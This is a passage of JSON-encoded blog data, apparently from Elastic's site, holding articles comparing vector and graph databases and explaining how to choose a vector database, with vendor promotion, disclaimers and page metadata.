technology","_metadata":{"uid":"cscd8fa41db15956d7"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEach of these database types has its own strengths and weaknesses. Vector databases are ideal for similarity search, are efficient with high-dimensional data, and handle large data sets well. Graph databases excel at navigating relationships, are powerful for complex network analysis, and have highly flexible schema.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Unlock the full potential of your data","_metadata":{"uid":"cscf4e58af4f7cfb70"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNavigating the big data landscape demands powerful tools, and vector and graph databases stand as innovative players in this information space. But selecting the right model for your needs can be daunting.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCarefully evaluate the factors above and understand the distinct strengths of each technology. You’ll end up with a list of factors that will inform your decision, helping you choose the right database model to unlock the full potential of your data.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What you should do next","_metadata":{"uid":"csd1308aa62de6f58d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhenever you're ready, here are four ways we can help you bring better search experiences to your business:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/cloud/generative-ai-trial-overview\"\u003e\u003cspan style='font-size: 12pt;'\u003eStart a free trial\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(67, 67, 67);font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eand see how Elastic can help your business.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/platform\"\u003e\u003cspan style='font-size: 12pt;'\u003eTour our solutions\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to see how the Elasticsearch Platform works and how our solutions will fit your needs.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/virtual-events/how-vector-databases-power-ai-search\"\u003e\u003cspan style='font-size: 12pt;'\u003eLearn how vector databases power AI search\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eShare this article with someone you know who'd enjoy reading it via email, LinkedIn, Twitter, or Facebook.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e"}],"_metadata":{"uid":"cs884800be8109c820"}}},{"callout":{"title_l10n":"Explore more data analytics and database resources:","_metadata":{"uid":"cs512f5ef3207faa9b"},"paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/elasticsearch/vector-database\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eExplore the world's most downloaded vector database\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/categories/vector-search\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003eElasticsearch Labs: Use Elastic for vector search\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/explore/succeed-with-the-power-of-elastic/strategic-guide-to-putting-your-data-to-work\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eReal-world problems require real-time data: A strategic guide to putting your data to work\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1077b37ad73ca528"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs20ee86ce88a5507a"}}}],"publish_date":"2024-04-11","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blta80f5b054d6a2b37","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-04-11T14:23:17.644Z","updated_at":"2024-04-11T14:23:17.644Z","content_type":"image/jpeg","file_size":"64460","filename":"Fast_moving_walkway.jpg","title":"Fast_moving_walkway.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-04-11T14:23:42.902Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta80f5b054d6a2b37/6617f2559df77edb47de3520/Fast_moving_walkway.jpg"},"title":"Vector database vs. graph database: Understanding the differences","title_l10n":"Vector database vs. graph database: Understanding the differences","updated_at":"2025-01-17T19:20:22.797Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/vector-database-vs-graph-database","publish_details":{"time":"2025-01-17T19:22:41.129Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt57569d4353dd5dea","_version":4,"locale":"en-us","ACL":{},"abstract_l10n":"Explore the different types of vector databases available and discover the key factors to consider when choosing the right one.","author":["blt6705dad0ae6f1419"],"category":["blte5cc8450a098ce5e"],"created_at":"2024-07-15T13:52:58.224Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1c67fece42688cca"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe world of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/vector-database\"\u003e\u003cspan style='font-size: 12pt;'\u003evector databases\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e is a rapidly evolving field that's transforming the way we manage and search data. Unlike traditional databases, vector databases store and manage data as vectors. This unique approach allows for more precise and relevant searches and allows the use of machine learning in retrieval, making vector databases an invaluable tool.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs the volume of data we generate continues to grow, the role of vector databases in data management and search is becoming increasingly important. That's because of the relevancy of results and being able to work with unstructured data.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eChoosing the right vector database can make a huge difference for your application, but it's not always an easy task. There are many factors to consider, from the database's performance and scalability to its compatibility with your existing systems. This guide aims to help you navigate these considerations and make an informed decision. These are the questions we'll be answering:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHow are vector databases different from traditional databases?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhat types of vector databases are available?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhat are the key features?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhat factors are important when choosing a vector database?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBy the end of this article, you'll have a solid understanding of vector databases and how to choose the right one for your team.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"How are vector databases different from traditional databases?","_metadata":{"uid":"cs105520333ee61749"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTraditional databases, such as relational databases, store data with rows and columns inside tables. Each row represents a record, and each column represents a field of that record. This setup works well for \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/structured-data\"\u003e\u003cspan style='font-size: 12pt;'\u003estructured data\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, but it can be limiting when dealing with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/unstructured-data\"\u003e\u003cspan style='font-size: 12pt;'\u003eunstructured data\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/elasticsearch/vector-database\"\u003e\u003cspan style='font-size: 12pt;'\u003eVector databases\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, on the other hand, transform this unstructured data into vectors, which are essentially machine learning representations that portray complex data in a simplified form. These vectors can then be compared and searched, making vector databases particularly useful for handling large data sets and improving the performance of data-driven applications.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe key difference between vector databases and traditional databases lies in their approach to data management. While traditional databases focus on storing data in a structured format, vector databases prioritize the efficient representation and retrieval of vector data. This makes vector databases useful with modern technology, where the ability to quickly access and analyze relevant information can provide a significant competitive advantage. This includes things like AI and large language models (LLMs), where finding the most relevant data can be the difference between an app making the right or wrong choice.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Types of vector database","_metadata":{"uid":"cs3b6b76151d7406d5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLike most types of tech, vector databases come in various flavors — each one with its own unique strengths, weaknesses, and use cases. Let's explore some popular types.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Graph-based vector databases","_metadata":{"uid":"cs498665c6dd1bef79"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGraph-based vector databases are designed to efficiently handle complex, interconnected data. They represent data as nodes (or vertices) and edges: nodes represent entities, and edges represent relationships between entities.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe main advantage of this design is the ability to efficiently handle complex, interconnected data. They excel at analyzing connections and relationships between data points, which can be crucial in certain applications. They can be less intuitive for simple similarity searches, though. This is because they are designed to handle complex relationships, which can make simple searches more complicated than necessary.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGraph-based databases excel in scenarios where the relationships between data points are as important as the data points themselves. This includes things like social network analysis and knowledge graphs, where the relationships between different pieces of information are key.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Integrated or point solution ","_metadata":{"uid":"csac5a3d87e4c709c7"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eVector databases are available in two different forms: integrated into a more full-featured product or as a point solution.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAn integrated vector database combines the capabilities of vector data with the functions you’d expect from a traditional database into a single platform. This means you can store, manage, and query your data both as structured business data and as unstructured vector data within the same system.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHowever, a point solution is a specialized, bespoke system designed specifically for storing, managing, and querying vector data. The focus of point solutions is on optimizing vector operations and similarity search, so they can perform well on vector-specific tasks. They’re usually standalone systems that need to be integrated into your existing applications and architectures.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Key features of vector databases","_metadata":{"uid":"csc6cf5cb12eb39185"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen choosing a vector database, thoroughly evaluate the product’s feature set and how it addresses your specific use case and requirements. These features can significantly impact the database's performance, usability, and compatibility with your existing systems. Let's delve into some of these essential features:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eVector dimensions: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eThis refers to the number of numerical elements each vector embedding contains. Each dimension corresponds to a specific feature or property of the data object, and the dimensionality of vectors will have a direct impact on both the accuracy and efficiency of the vector search.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAlgorithms: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eA vector database has algorithms that calculate vector similarity. These are essentially mathematical equations used to calculate how close or related different vector embeddings are to each other.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNative integration: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eTo get the benefits, you need your vector database to be able to seamlessly integrate with your existing databases and systems. This means you can perform combined queries that use both the vector similarity search and conventional SQL operations.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eStorage and retrieval: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eThe efficiency of a vector database in storing and retrieving data is crucial. This performance can impact the speed of your applications and the overall user experience.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePerformance: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eThe performance of a vector database is determined by how quickly it can execute operations like searches, updates, and deletions. High-performance vector databases can handle large data sets and provide quick, accurate results.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSearching, sorting, and filtering:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e A robust vector database should offer powerful search capabilities, including the ability to sort and filter results. This can help you quickly find relevant information in large data sets. This is especially important as vector databases are often used to “prompt” LLMs. High-quality prompts can only be retrieved through high-relevance search.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eManagement and maintenance: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eConsider how easy it is to manage and maintain the database. This includes tasks like adding new data, updating existing data, and ensuring the database remains secure and reliable.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cse2ee12581f4c0d50"}}},{"banner":{"reference":[{"uid":"blt847c8045ef98f7d0","_content_type_uid":"banner"}],"_metadata":{"uid":"cse020c681fdf4a08f"}}},{"title_text":{"title_text":[{"title_l10n":"Factors to consider when choosing a vector database","_metadata":{"uid":"cs5af523bf815b263a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen selecting a vector database, evaluate these key factors to ensure it aligns with your specific needs and project requirements:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSearch accuracy:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e The database should provide accurate search results. This is particularly important for applications where precision is crucial.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDocumentation: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eYou need to have comprehensive documentation, so you have essential guidance to follow as you set up your implementation. The documentation should also include troubleshooting and optimization instructions.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eLanguage clients: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eThese are language-specific libraries, provided to help developers interact with the database. You want to look for one that is both intuitive and efficient to simplify the integration process.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eScalability:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Consider the database's ability to handle growth. As your data grows, the database should be able to grow with you without losing performance.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePerformance:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Evaluate the speed and efficiency of the database. This includes the speed of data storage, retrieval, and search operations.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eData type support:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Ensure the database supports the types of data you'll be working with. Some databases are better suited for certain data types than others.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSystem integration:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Consider how well the database integrates with your existing systems. A seamless integration can save time and resources.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eProject requirements:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Your specific project requirements should guide your choice. Consider factors like the size of your data set, the complexity of your data, and the specific tasks you need to perform.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Benefits of Elastic as your vector database","_metadata":{"uid":"cs09311b7dc684466d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThere's plenty to consider when choosing your vector database, but that doesn't mean some options aren't easier than others.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAt Elastic, we've created a flexible and adaptable vector database solution out of the box. Our support for machine learning models gives you advanced analytics and predictive capabilities, so you can uncover valuable insights and make data-driven decisions.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOne of our most important features is the Hierarchical Navigable Small Worlds (HNSW) storage. This graph-based algorithm means Elastic can handle large data sets and deliver quick, accurate \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/category/vector-search\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003evector search\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e results. Coupled with robust search capabilities, including filtering and sorting, Elastic makes it easy to find relevant information in your data.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe also prioritize security, offering advanced features, such as role-based access control and document- and field-level security. These ensure that your data remains secure and that only authorized users can access sensitive information.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What you should do next","_metadata":{"uid":"cs4c9e8a62f8406f06"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhenever you're ready, here are four ways we can help you harness insights from your data:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/cloud/generative-ai-trial-overview\"\u003e\u003cspan style='font-size: 12pt;'\u003eStart a free trial\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(67, 67, 67);font-size: 12pt;'\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eand see how Elastic can help your business.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/platform\"\u003e\u003cspan style='font-size: 12pt;'\u003eTour our solutions\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to see how the Elastic Search AI Platform works and how our solutions will fit your needs.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/virtual-events/how-vector-databases-power-ai-search\"\u003e\u003cspan style='font-size: 12pt;'\u003eExplore how vector databases power AI search\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(67, 67, 67);font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eShare this article with someone you know who'd enjoy reading it via email, LinkedIn, X, or Facebook.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e"}],"_metadata":{"uid":"cs26de9e0f2661edfe"}}},{"callout":{"title_l10n":"Explore more vector database resources:","_metadata":{"uid":"cs190158c3b4a5046f"},"paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/what-is/vector-database\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWhat is a vector database?\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/vector-database-vs-graph-database\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eVector database vs. graph database\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/virtual-events/how-vector-databases-power-ai-search\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHow vector databases power AI search\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/elasticsearch/vector-database\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWorld's most used vector database\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/articles/lexical-ai-powered-search-elastic-vector-database\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHow to get the best of lexical and AI search\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1a947ee574edc0bc"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs1ad872fed8004a27"}}}],"publish_date":"2024-07-15","sanity_migration_complete":false,"seo":{"seo_title_l10n":"How to choose a vector database","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltb4928f8cf10d2cff","ACL":{},"created_at":"2023-11-06T21:35:16.245Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"vector-search","label_l10n":"Vector search","tags":[],"title":"Vector search","updated_at":"2023-11-06T21:35:16.245Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.491Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt07abc70739e66bac","_version":1,"title":"Trees and mountains.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-07-15T14:00:21.265Z","updated_at":"2024-07-15T14:00:21.265Z","content_type":"image/jpeg","file_size":"178438","filename":"Trees_and_mountains.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-07-15T14:02:24.875Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt07abc70739e66bac/66952b7554407586bafea0e5/Trees_and_mountains.jpg"},"title":"How to choose a vector database","title_l10n":"How to choose a vector database","updated_at":"2025-01-17T19:19:35.123Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/how-to-choose-a-vector-database","publish_details":{"time":"2025-01-17T19:19:39.141Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt30a3f6bd380b89a4","_version":6,"locale":"en-us","ACL":{},"abstract_l10n":" Explore the role of AI in customer support, from chatbots to virtual assistants, enhancing user experiences and increasing satisfaction without replacing human agents.","author":["blt6705dad0ae6f1419"],"category":["bltc17514bfdbc519df"],"created_at":"2024-09-25T16:38:28.484Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs4ff02e8c9c9f3130"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe’ve all experienced it: walking into the store and seeing 